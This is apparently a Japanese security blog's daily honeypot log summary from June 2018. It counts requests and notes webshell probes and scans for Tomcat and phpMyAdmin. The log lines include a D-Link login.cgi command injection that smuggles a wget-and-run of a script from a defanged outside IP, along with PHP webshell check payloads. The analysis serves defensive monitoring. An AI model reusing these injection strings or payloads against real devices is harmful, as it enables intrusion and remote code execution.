S-Owl

S(ecurity)Owl

WOWHoneypot簡易分析(14日目)

WOWhoneypotの2018/6/17(日)(運用14日目)の簡易分析です。

本日の総アクセス数は126件です。だいぶ落ち着きました。

50 [2018-06-17 "GET /
33 [2018-06-17 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
30 [2018-06-17 "HEAD /
1 [2018-06-17 "PROPFIND /
1 [2018-06-17 "POST /xx.php
1 [2018-06-17 "POST /xw.php
1 [2018-06-17 "POST /wuwu11.php
1 [2018-06-17 "POST /w.php
1 [2018-06-17 "POST /s.php
1 [2018-06-17 "POST /sheep.php
1 [2018-06-17 "POST /db.init.php
1 [2018-06-17 "GET /x
1 [2018-06-17 "GET /manager/html
1 [2018-06-17 "GET /index.php
1 [2018-06-17 "GET /iem/admin/index.php
1 [2018-06-17 "GET /admin/index.php

D-Linkの脆弱性を突く攻撃は日毎に件数が増加しています。(1件→8件→33件)

幾つかPOSTしているログがあるので、それを見てみます。

POST /wuwu11.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die*1;

POST /xw.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die*2;

POST /xx.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

axa=die*3;

POST /s.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die*4;

POST /w.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die*5;

POST /db.init.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

eval=die*6;

POST /sheep.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

m=die*7

7種類ありますが、どれもペイロードの中身はほぼ同じため、同じ目的の攻撃と思われます。

推測ですが、何らかのWebShellが埋め込まれているかの確認?という気がします。

それ以外のアクセスログTomcatphpMyAdminに関連するパスへのアクセスで、使用有無の調査行為と思われます。

 

ハンティングログは以下です。

33 [2018-06-17 wget hxxp://185.62.190[.]191/r

 

以上です。

*1:string)(111111111*9

*2:string)(111111111*9

*3:string)(111111111*9

*4:string)(111111111*9

*5:string)(111111111*9

*6:string)(111111111*9

*7:string)(111111111*9